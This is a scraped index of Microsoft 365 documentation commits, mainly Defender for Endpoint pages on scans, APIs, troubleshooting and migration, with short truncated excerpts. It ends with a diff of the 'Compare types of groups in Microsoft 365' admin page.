security	Prevent End User Interaction Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/prevent-end-user-interaction-microsoft-defender-antivirus.md	You can prevent users from pausing scans, which can be helpful to ensure schedul - [Configure the notifications that appear on endpoints](configure-notifications-microsoft-defender-antivirus.md) - [Configure end-user interaction with Microsoft Defender Antivirus](configure-end-user-interaction-microsoft-defender-antivirus.md) - [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security	Preview Settings	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/preview-settings.md	Turn on the preview experience setting to be among the first to try upcoming fea - [Configure email notifications in Microsoft Defender for Endpoint](configure-email-notifications.md)
security	Preview	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/preview.md	Turn on the preview experience setting to be among the first to try upcoming fea > [!TIP] > Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-preview-belowfoldlink)
security	Printer Protection Frequently Asked Questions	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/printer-protection-frequently-asked-questions.md	Different from AD group, the Sid is using Object ID for Azure AD group. You can PrintJobBlocked is designed for [Printer Protection V1](printer-protection.md). Because the new Printer Protection solution is built based on the V1 solution, the system will still use PrintJobBlocked. If you are using the [new Printer Protection](printer-protection-overview.md), RemovableStoragePolicyTriggered is used to track the event.
security	Printer Protection Overview	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/printer-protection-overview.md	The table below lists the properties you can use in Parameters: You can view the policy name and printer information if you have right options setting in your policy. :::image type="content" source="images/enduser-experience.png" alt-text="This is enduser experience image.":::
security	Printer Protection	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/printer-protection.md	DeviceEvents ``` :::image type="content" source="https://user-images.githubusercontent.com/81826151/128954383-71df3009-77ef-40db-b575-79c73fda332b.png" alt-text="The Advanced Hunting page" lightbox="https://user-images.githubusercontent.com/81826151/128954383-71df3009-77ef-40db-b575-79c73fda332b.png":::
security	Production Deployment	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/production-deployment.md	The following downloadable spreadsheet lists the services and their associated U ## Next step - Continue to [Step 2 - Assign roles and permissions](prepare-deployment.md)
security	Professional Services	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/professional-services.md	Mature and maintain your internal team's security capabilities to prevent, detec - [Use the Microsoft Graph security API - Microsoft Graph \| Microsoft Learn](/graph/api/resources/security-api-overview) - [Configure managed service security provider integration](configure-mssp-support.md)
security	Raw Data Export Event Hub	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/raw-data-export-event-hub.md	To get the data types for event properties do the following: - [Stream Microsoft Defender for Endpoint events to your Azure storage account](raw-data-export-storage.md) - [Azure Event Hubs documentation](/azure/event-hubs/) - [Troubleshoot connectivity issues - Azure Event Hubs](/azure/event-hubs/troubleshooting-guide)
security	Raw Data Export Storage	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/raw-data-export-storage.md	In order to get the data types for our events properties do the following: - [Microsoft Defender for Endpoint Streaming API](raw-data-export.md) - [Stream Microsoft Defender for Endpoint events to your Azure storage account](raw-data-export-storage.md) - [Azure Storage Account documentation](/azure/storage/common/storage-account-overview)
security	Raw Data Export	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/raw-data-export.md	Topic\|Description - [Overview of Advanced Hunting](advanced-hunting-overview.md) - [Azure Event Hubs documentation](/azure/event-hubs/)-- [Azure Storage Account documentation](/azure/storage/common/storage-account-overview) +- [Azure Storage Account documentation](/azure/storage/common/storage-account-overview)
security	Rbac	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/rbac.md	Someone with a Defender for Endpoint Global administrator role has unrestricted - [RBAC roles](../office-365-security/migrate-to-defender-for-office-365-onboard.md#rbac-roles) - [Create and manage device groups in Microsoft Defender for Endpoint](machine-groups.md)
security	Recommendation	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/recommendation.md	Want to experience Defender for Endpoint? [Sign up for a free trial.](https://si \|nonProductivityImpactedAssets\|Long\|Number of devices that are not affected\| \|relatedComponent\|String\|Related software component\| \|
security	Respond File Alerts	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/respond-file-alerts.md	If you come across a problem when trying to submit a file, try each of the follo - [Take response actions on a device](respond-machine-alerts.md) - [Investigate files](investigate-files.md) - [Manual response actions in Microsoft Defender for Endpoint Plan 1](defender-endpoint-plan-1.md#manual-response-actions)
security	Respond Machine Alerts	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/respond-machine-alerts.md	-∩╗┐ + Title: Take response actions on a device in Microsoft Defender for Endpoint description: Take response actions on a device such as isolating devices, collecting an investigation package, managing tags, running an av scan, and restricting app execution. keywords: respond, isolate, isolate device, collect investigation package, action center, restrict, manage tags, av scan, restrict app All other related details are also shown, for example, submission date/time, sub - [Take response actions on a file](respond-file-alerts.md) - [Manual response actions in Microsoft Defender for Endpoint Plan 1](defender-endpoint-plan-1.md#manual-response-actions) - [Report inaccuracy](/microsoft-365/security/defender-endpoint/tvm-security-recommendation#report-inaccuracy)
security	Restore Quarantined Files Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/restore-quarantined-files-microsoft-defender-antivirus.md	If Microsoft Defender Antivirus is configured to detect and remediate threats on - [Review scan results](review-scan-results-microsoft-defender-antivirus.md) - [Configure and validate exclusions based on file name, extension, and folder location](configure-extension-file-exclusions-microsoft-defender-antivirus.md) - [Configure and validate exclusions for files opened by processes](configure-process-opened-file-exclusions-microsoft-defender-antivirus.md)-- [Configure Microsoft Defender Antivirus exclusions on Windows Server](configure-server-exclusions-microsoft-defender-antivirus.md) +- [Configure Microsoft Defender Antivirus exclusions on Windows Server](configure-server-exclusions-microsoft-defender-antivirus.md)
security	Restrict Code Execution	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/restrict-code-execution.md	POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2 ``` - To remove code execution restriction from a device, see [Remove app restriction](unrestrict-code-execution.md).
security	Review Alerts	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/review-alerts.md	Selecting a device or a user card in the affected assets sections will switch to - [View and organize the incidents queue](view-incidents-queue.md) - [Investigate incidents](investigate-incidents.md) - [Manage incidents](manage-incidents.md)
security	Review Scan Results Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/review-scan-results-microsoft-defender-antivirus.md	Use the [Get method of the MSFT_MpThreat and MSFT_MpThreatDetection] - [Customize, initiate, and review the results of Microsoft Defender Antivirus scans and remediation](customize-run-review-remediate-scans-microsoft-defender-antivirus.md) - [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
security	Run Advanced Query Api	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-advanced-query-api.md	Here is an example of the response. - [Microsoft Defender for Endpoint APIs introduction](apis-intro.md) - [Advanced Hunting from Portal](advanced-hunting-query-language.md) - [Advanced Hunting using PowerShell](run-advanced-query-sample-powershell.md)
security	Run Advanced Query Sample Powershell	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-advanced-query-sample-powershell.md	$results \| ConvertTo-Json \| Set-Content file1.json - [Microsoft Defender for Endpoint APIs](apis-intro.md) - [Advanced Hunting API](run-advanced-query-api.md) - [Advanced Hunting using Python](run-advanced-query-sample-python.md)
security	Run Advanced Query Sample Python	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-advanced-query-sample-python.md	outputFile.close() - [Microsoft Defender for Endpoint APIs](apis-intro.md) - [Advanced Hunting API](run-advanced-query-api.md) - [Advanced Hunting using PowerShell](run-advanced-query-sample-powershell.md)
security	Run Analyzer Macos Linux	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-analyzer-macos-linux.md	Usage example `sudo ./mde_support_tool.sh skipfaultyrules -e true` - perf_benchmark.tar.gz Description: The performance test reports. You will see this only if you are using the performance parameter.
security	Run Analyzer Windows	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-analyzer-windows.md	By default, the unpacked MDEClientAnalyzerResult.zip file will contain the follo - [Download and run the client analyzer](download-client-analyzer.md) - [Data collection for advanced troubleshooting on Windows](data-collection-analyzer.md) - [Understand the analyzer HTML report](analyzer-report.md)
security	Run Av Scan	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-av-scan.md	POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2 "ScanType": "Full" } ```
security	Run Detection Test	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-detection-test.md	The Command Prompt window closes automatically. If successful, a new alert appea - [Onboard Windows devices](configure-endpoints.md) - [Onboard servers](configure-server-endpoints.md) - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](/microsoft-365/security/defender-endpoint/troubleshoot-onboarding)
security	Run Live Response	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-live-response.md	Content-type: application/json - [Get machine action API](get-machineaction-object.md) - [Get live response result](get-live-response-result.md) - [Cancel machine action](cancel-machine-action.md)
security	Run Scan Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/run-scan-microsoft-defender-antivirus.md	For more information about which parameters are allowed, see [Windows Defender W > - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md) > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) -> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) +> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Schedule Antivirus Scan In Mde	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/schedule-antivirus-scan-in-mde.md	Use the following steps to schedule scans: Tue Jun 14 20:20:50 UTC 2022 Time Scan Finished [root@redhat7 cron.weekly] # ```
security	Schedule Antivirus Scans Group Policy	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/schedule-antivirus-scans-group-policy.md	For more information, see the [Manage when protection updates should be download > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) > - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Schedule Antivirus Scans Powershell	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/schedule-antivirus-scans-powershell.md	For more information about how to use PowerShell with Microsoft Defender Antivir > - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md) > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) -> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) +> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Schedule Antivirus Scans Wmi	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/schedule-antivirus-scans-wmi.md	For more information and allowed parameters, see [Windows Defender WMIv2 APIs](/ > - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md) > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) -> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) +> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Schedule Antivirus Scans	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/schedule-antivirus-scans.md	This optimization applies to machines running Windows 10 Anniversary Update (ver ## See also - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)-- [Onboard non-Windows devices](configure-endpoints-non-windows.md) +- [Onboard non-Windows devices](configure-endpoints-non-windows.md)
security	Score	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/score.md	Score\|Double\|The current score. Time\|DateTime\|The date and time in which the call for this API was made. RbacGroupName\|String\|The device group name. RbacGroupId\|String\|The device group ID.
security	Server Migration	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/server-migration.md	If you're using Microsoft Defender for Cloud, you can leverage the automated upg ## Group Policy configuration For configuration using Group Policy, ensure you're using the latest ADMX files in your central store to access the correct Defender for Endpoint policy options. Please reference [How to create and manage the Central Store for Group Policy Administrative Templates in Windows](/troubleshoot/windows-client/group-policy/create-and-manage-central-store) and download the latest files for use with Windows 10.
security	Set Device Value	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/set-device-value.md	POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2 "DeviceValue" : "High" } ```
security	Software	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/software.md	Last updated 12/18/2020 \|exposedMachines\|Long\|Number of exposed devices\| \|impactScore\|Double\|Exposure score impact of this software\| \|
security	Specify Additional Definitions Network Traffic Inspection Mdav	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/specify-additional-definitions-network-traffic-inspection-mdav.md	You can specify additional definition sets for network traffic inspection using - [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md) - [Enable cloud-delivered protection](enable-cloud-protection-microsoft-defender-antivirus.md)-- [How to create and deploy anti-malware policies: Cloud-protection service](/configmgr/protect/deploy-use/endpoint-antimalware-policies#cloud-protection-service) +- [How to create and deploy anti-malware policies: Cloud-protection service](/configmgr/protect/deploy-use/endpoint-antimalware-policies#cloud-protection-service)
security	Specify Cloud Protection Level Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/specify-cloud-protection-level-microsoft-defender-antivirus.md	Cloud protection works together with Microsoft Defender Antivirus to deliver pro - [Onboard non-Windows devices to Defender for Endpoint](configure-endpoints-non-windows.md) - [Turn on cloud protection in Microsoft Defender Antivirus](enable-cloud-protection-microsoft-defender-antivirus.md)
security	Stop And Quarantine File	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/stop-and-quarantine-file.md	POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2 "Sha1": "87662bc3d60e4200ceaf7aae249d1c343f4b83c9" } ```
security	Supported Capabilities By Platform	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/supported-capabilities-by-platform.md	The following table gives information about the supported Microsoft Defender for > [!NOTE] > Windows 7, 8.1, Windows Server 2008 R2 include support for the EDR sensor, and AV using System Center Endpoint Protection (SCEP).
security	Switch To Mde Overview	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-mde-overview.md	The process of migrating to Defender for Endpoint can be divided into three phas ## Next step - Proceed to [Prepare for your migration](switch-to-mde-phase-1.md).
security	Switch To Mde Phase 1	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-mde-phase-1.md	To enable communication between your devices and Defender for Endpoint, you migh Congratulations! You've completed the Prepare phase of [switching to Defender for Endpoint](switch-to-mde-overview.md#the-migration-process)! - [Proceed to set up Defender for Endpoint](switch-to-mde-phase-2.md).
security	Switch To Mde Phase 2	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-mde-phase-2.md	Device groups, device collections, and organizational units enable your security Congratulations! You've completed the Setup phase of [migrating to Defender for Endpoint](switch-to-mde-overview.md#the-migration-process)! - [Proceed to Phase 3: Onboard to Defender for Endpoint](switch-to-mde-phase-3.md)
security	Switch To Mde Phase 3	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-mde-phase-3.md	To learn more, see [Device inventory](machines-view-overview.md). Congratulations! You have completed your [migration to Defender for Endpoint](switch-to-mde-overview.md#the-migration-process)! - [Manage Defender for Endpoint, post migration](manage-mde-post-migration.md).
security	Switch To Mde Troubleshooting	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-mde-troubleshooting.md	If you are using a non-Microsoft antivirus/antimalware solution on Windows Serve - [Microsoft Defender Antivirus compatibility with other security products](microsoft-defender-antivirus-compatibility.md) - [Onboarding tools and methods for Windows devices in Defender for Endpoint](configure-endpoints.md)
security	Tamper Resiliency	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/tamper-resiliency.md	If [Windows Defender Application Control](/windows/security/threat-protection/wi
security	Tamperprotection Macos	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/tamperprotection-macos.md	configuration_is_managed : false ```console $ sudo grep -F '[{tamperProtection}]: Feature state:' /Library/Logs/Microsoft/mdatp/microsoft_defender_core.log \| tail -n 1 ```
security	Techniques Device Timeline	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/techniques-device-timeline.md	To view only either events or techniques, select Filters from the device tim - [View and organize the Devices list](machines-view-overview.md) - [Microsoft Defender for Endpoint device timeline event flags](device-timeline-event-flag.md)
security	Technological Partners	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/technological-partners.md	The following are the solution's categories: - [Use the Microsoft Graph security API - Microsoft Graph \| Microsoft Learn](/graph/api/resources/security-api-overview) - [Connect apps to get visibility and control\|Microsoft Docs](/defender-cloud-apps/enable-instant-visibility-protection-and-governance-actions-for-your-apps)-- [Partner applications in Microsoft Defender for Endpoint\|Microsoft Docs](partner-applications.md) +- [Partner applications in Microsoft Defender for Endpoint\|Microsoft Docs](partner-applications.md)
security	Threat Analytics Analyst Reports	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/threat-analytics-analyst-reports.md	Advanced hunting queries in the analyst reports have been vetted by Microsoft an - [Threat analytics overview](threat-analytics.md) - [Proactively find threats with advanced hunting](advanced-hunting-overview.md) - [Custom detection rules](custom-detection-rules.md)
security	Threat Analytics	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/threat-analytics.md	When using the reports, keep the following in mind: - [Proactively find threats with advanced hunting](advanced-hunting-overview.md) - [Understand the analyst report section](threat-analytics-analyst-reports.md) - [Assess and resolve security weaknesses and exposures](next-gen-threat-and-vuln-mgt.md)
security	Threat Indicator Concepts	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/threat-indicator-concepts.md	IOCs have a many-to-one relationship with alert definitions such that an alert d - [Use the Microsoft Graph security API - Microsoft Graph \| Microsoft Learn](/graph/api/resources/security-api-overview) - [Manage indicators](manage-indicators.md)
security	Threat Protection Integration	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/threat-protection-integration.md	With Microsoft 365 Defender, Microsoft Defender for Endpoint, and various Micros - [Microsoft 365 Defender overview](/microsoft-365/security/defender/microsoft-365-defender) - [Turn on Microsoft 365 Defender](/microsoft-365/security/defender/m365d-enable) - [Protect users, data, and devices with Conditional Access](conditional-access.md)
security	Threat Protection Reports	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/threat-protection-reports.md	For example, to show data about high-severity alerts only: ## Related topic - [Device health and compliance report](device-health-reports.md)
security	Ti Indicator	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ti-indicator.md	For more information on the description of the response action types, see [Creat - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security	Time Settings	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/time-settings.md	The following date and time formats are currently not supported: ##### Decimal symbol used in numbers Decimal symbol used is always a dot, even if a comma is selected in the Numbers format settings in Region settings. For example, 15,5K is displayed as 15.5K.
security	Troubleshoot Asr Rules	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-asr-rules.md	Title: Report and troubleshoot Microsoft Defender for Endpoint ASR Rules description: This topic describes how to report and troubleshoot Microsoft Defender for Endpoint ASR Rules -keywords: Attack surface reduction rules, asr, hips, host intrusion prevention system, protection rules, anti-exploit, antiexploit, exploit, infection prevention, microsoft defender for endpoint -search.product: eADQiWindows 10XVcnh -ms.pagetype: security -ms.sitesec: library ms.localizationpriority: medium audience: ITPro-+ - m365-security - tier3 search.appverid: met150 Previously updated : 12/05/2022 Last updated : 07/18/2023 # Report and troubleshoot Microsoft Defender for Endpoint ASR Rules Through advanced hunting, it's possible to extract ASR rules information, create ASR rules events are available to be queried from the DeviceEvents table in the advanced hunting section of the Microsoft 365 Defender. For example, a simple query such as the one below can report all the events that have ASR rules as data source, for the last 30 days, and will summarize them by the ActionType count, that in this case it will be the actual codename of the ASR rule. +```kusto +DeviceEvents +\| where Timestamp > ago(30d) +\| where ActionType startswith "Asr" +\| summarize EventCount=count() by ActionType +``` :::image type="content" source="images/adv-hunt-sc-2new.png" alt-text="The Advanced hunting page" lightbox="images/adv-hunt-sc-2new.png"::: The most relevant files are as follows: - MPOperationalEvents.txt: This file contains same level of information found in Event Viewer for Windows Defender's Operational log. - MPRegistry.txt: In this file you can analyze all the current Windows Defender configurations, from the moment the support logs were captured. - MPLog.txt: This log contains more verbose information about all the actions/operations of the Windows Defender.
security	Troubleshoot Asr	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-asr.md	When you report a problem with attack surface reduction rules, you're asked to c - [Attack surface reduction rules](attack-surface-reduction.md) - [Enable attack surface reduction rules](enable-attack-surface-reduction.md) - [Evaluate attack surface reduction rules](evaluate-attack-surface-reduction.md)
security	Troubleshoot Cloud Connect Mdemac	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-cloud-connect-mdemac.md	The output from this command should be similar to: OK https://x.cp.wd.microsoft.com/api/report OK https://cdn.x.cp.wd.microsoft.com/ping ```
security	Troubleshoot Collect Support Log	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-collect-support-log.md	If you also require Defender Antivirus support logs (MpSupportFiles.cab), then f - [Run the client analyzer on macOS or Linux](run-analyzer-macos-linux.md) - [Data collection for advanced troubleshooting on Windows](data-collection-analyzer.md) - [Understand the analyzer HTML report](analyzer-report.md)
security	Troubleshoot Exploit Protection Mitigations	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-exploit-protection-mitigations.md	If you haven't already, it's a good idea to download and use the [Windows Securi * [Enable exploit protection](enable-exploit-protection.md) * [Configure and audit exploit protection mitigations](customize-exploit-protection.md) * [Import, export, and deploy exploit protection configurations](import-export-exploit-protection-emet-xml.md)
security	Troubleshoot Live Response	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-live-response.md	Refer to the articles below to fully understand the WpnService service behavior - [Windows Push Notification Services (WNS) overview](/windows/uwp/design/shell/tiles-and-notifications/windows-push-notification-services--wns--overview) - [Enterprise Firewall and Proxy Configurations to Support WNS Traffic](/windows/uwp/design/shell/tiles-and-notifications/firewall-allowlist-config) - [Microsoft Push Notifications Service (MPNS) Public IP ranges](https://www.microsoft.com/download/details.aspx?id=44535)
security	Troubleshoot Mdatp	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-mdatp.md	When you use Microsoft Defender for Cloud to monitor servers, a Microsoft Defend - [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md) - [Review events and errors using Event Viewer](event-error-codes.md)
security	Troubleshoot Np	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-np.md	You can configure the registry key by using PowerShell, Microsoft Configuration - [Evaluate network protection](evaluate-network-protection.md) - [Enable network protection](enable-network-protection.md) - [Address false positives/negatives in Defender for Endpoint](defender-endpoint-false-positives-negatives.md)
security	Troubleshoot Onboarding Error Messages	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-onboarding-error-messages.md	If you encounter issues with accessing the portal, missing data, or restricted a - `https://secure.aadcdn.microsoftonline-p.com` - `https://security.microsoft.com` - `https://static2.sharepointonline.com`
security	Troubleshoot Onboarding	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-onboarding.md	The steps below provide guidance for the following scenario: - [Troubleshoot Microsoft Defender for Endpoint](troubleshoot-mdatp.md) - [Onboard devices](onboard-configure.md) - [Configure device proxy and Internet connectivity settings](configure-proxy-internet.md)

admin

https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/admin/create-groups/compare-groups.md

Title: "Compare groups"- Previously updated : 02/18/2020

+ Title: Compare types of groups in Microsoft 365

+ Last updated : 07/18/2023 f1.keywords: CSH

search.appverid:

- MET150 - MOE150 ms.assetid: 758759ad-63ee-4ea9-90a3-39f941897b7d

-description: "Microsoft 365 Group members get a group email and shared workspace for conversations, files, and calendar events, Stream, and a Planner."

+description: Learn about the types of groups that are available in Microsoft 365

-# Compare groups

+# Compare types of groups in Microsoft 365

In the <a href="https://go.microsoft.com/fwlink/p/?linkid=2052855" target="_blank">**Groups**</a> section of the Microsoft 365 admin center, you can create and manage these types of groups: -- **Microsoft 365 Groups** are used for collaboration between users, both inside and outside your company. They include collaboration services such as SharePoint and Planner.

+- **Microsoft 365 Groups** are used for collaboration between users, both inside and outside your company. They include collaboration services such as SharePoint and Planner. Microsoft Teams uses Microsoft 365 Groups for membership.

- **Distribution groups** are used for sending email notifications to a group of people. - **Security groups** are used for granting access to resources such as SharePoint sites. - **Mail-enabled security groups** are used for granting access to resources such as SharePoint, and emailing notifications to those users.

All of these group types can be used with Power Automate.

## Microsoft 365 Groups

-Microsoft 365 Groups are used for collaboration between users, both inside and outside your company. With each Microsoft 365 Group, members get a group email and shared workspace for conversations, files, and calendar events, Stream, and a Planner.

+Microsoft 365 Groups are used for collaboration between users, both inside and outside your company. With each Microsoft 365 group, members get a group email and shared workspace for conversations, files, and calendar events, Stream, and a Planner. Microsoft 365 Groups can also be connected to Teams or Viva Engage.

You can add people from outside your organization to a group as long as this has been [enabled by the administrator](manage-guest-access-in-groups.md). You can also allow external senders to send email to the group email address.

Microsoft 365 Groups can be accessed through mobile apps such as Outlook for iOS

Group members can send as or send on behalf of the group email address if this has been [enabled by the administrator](../../solutions/allow-members-to-send-as-or-send-on-behalf-of-group.md).

-Microsoft 365 groups support nesting through [dynamic groups in Azure Active Directory](/azure/active-directory/enterprise-users/groups-dynamic-rule-member-of).

+Microsoft 365 Groups support nesting through [dynamic groups in Azure Active Directory](/azure/active-directory/enterprise-users/groups-dynamic-rule-member-of).

Microsoft 365 Groups can be added to one of the three SharePoint groups (Owners, Members, or Visitors) to give people permissions to the site.

Unlike regular distribution groups that contain a defined set of members, the me

## Security groups

-[Security groups](../email/create-edit-or-delete-a-security-group.md) are used for granting access to Microsoft 365 resources, such as SharePoint. They can make administration easier because you need only administer the group rather than adding users to each resource individually.

+[Security groups](../email/create-edit-or-delete-a-security-group.md) are used for granting access to Microsoft 365 resources, such as SharePoint sites. They can make administration easier because you need only administer the group rather than adding users to each resource individually.

-Security groups can contain users or devices. Creating a security group for devices can be used with mobile device management services, such as Intune.

+Security groups can contain users or devices. Creating a security group for devices can be used with mobile device management services, such as Microsoft Intune.

Security groups can be [configured for dynamic membership in Azure Active Directory](/azure/active-directory/users-groups-roles/groups-change-type), allowing group members or devices to be added or removed automatically based on user attributes such as department, location, or title; or device attributes such as operating system version.

Shared mailboxes include a calendar that can be used for collaboration.

Users with permissions to the group mailbox can send as or send on behalf of the mailbox email address, if the administrator has given that user permissions to do that. This is especially useful for help and support mailboxes because users can send emails from "Contoso Support" or "Building A Reception Desk."

-It's not possible to migrate a shared mailbox to a Microsoft 365 Group.

+It's not possible to migrate a shared mailbox to a Microsoft 365 group.

## Related content

commerce

Billing Experience Overview

